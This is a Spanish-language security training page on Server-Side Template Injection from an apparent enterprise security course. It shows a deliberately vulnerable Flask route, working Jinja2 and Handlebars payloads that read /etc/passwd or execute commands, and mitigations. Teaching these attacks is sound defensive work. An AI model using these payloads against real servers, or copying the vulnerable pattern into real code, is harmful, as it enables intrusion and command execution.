Aitana Security Lab - Enterprise Security Training Platform
Filtros
Nivel / Rol
Categoría
Artículos (25)
HTTP: El Protocolo de la Web10 min
Estudiante
Cookies y Sesiones15 min
Estudiante
Autenticación y Autorización18 min
Estudiante
Arquitectura Cliente-Servidor15 min
Estudiante
APIs REST y Seguridad20 min
Estudiante
CORS y Same-Origin Policy16 min
Estudiante
SQL Injection (SQLi)20 min
Estudiante
Cross-Site Scripting (XSS)22 min
Estudiante
Cross-Site Request Forgery (CSRF)18 min
Estudiante
Insecure Direct Object References (IDOR)15 min
Estudiante
Broken Authentication19 min
Junior Developer
Command Injection20 min
Junior Developer
XML External Entity (XXE)25 min
Junior Developer
Server-Side Template Injection (SSTI)24 min
Junior Developer
Validación de Entrada15 min
Estudiante
Output Encoding14 min
Estudiante
Parameterized Queries16 min
Estudiante
Password Hashing17 min
Junior Developer
Content Security Policy (CSP)22 min
Junior Developer
Security Headers18 min
Junior Developer
Secure Session Management20 min
Junior Developer
Nikto15 min
Estudiante
OWASP ZAP22 min
Estudiante
Burp Suite25 min
Junior Developer
SQLMap20 min
Junior Developer
Wiki/Vulnerabilidades/SSTI
Avanzado
CVSS 8.8 - Alto
24 min

Server-Side Template Injection

Inyección de código en motores de plantillas del servidor

¿Qué es SSTI?

SSTI ocurre cuando input del usuario se inserta en plantillas del lado del servidor (Jinja2, Handlebars, etc) permitiendo ejecución de código arbitrario.

Ejemplo Vulnerable (Jinja2)

# Python/Flask - VULNERABLE
from flask import Flask, request, render_template_string

@app.route('/hello')
def hello():
    name = request.args.get('name', 'World')
    # ❌ PELIGROSO: renderizar input del usuario directamente
    template = f"<h1>Hello {name}!</h1>"
    return render_template_string(template)

# Ataque:
# /hello?name={{7*7}}  → devuelve 49 (confirma SSTI)
# /hello?name={{config}}  → leak configuración
# /hello?name={{''.__class__.__mro__[1].__subclasses__()}}  → RCE

Payloads por Motor

Jinja2 (Python)

{{7*7}}
{{config}}
{{self.__init__.__globals__}}
{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()}}

Handlebars (Node.js)

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').exec('whoami');"}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

Mitigación

// ✅ NUNCA renderizar input del usuario como plantilla
// Mal:
return render_template_string(f"<h1>Hello {name}!</h1>")

// Bien: usar contexto
return render_template('hello.html', name=name)

<!-- hello.html -->
<h1>Hello {{ name }}!</h1>  <!-- Jinja2 escapa automáticamente -->

// ✅ Sanitizar si es necesario
from markupsafe import escape
safe_name = escape(name)

// ✅ Usar sandboxing
from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()

Siguiente

Broken Authentication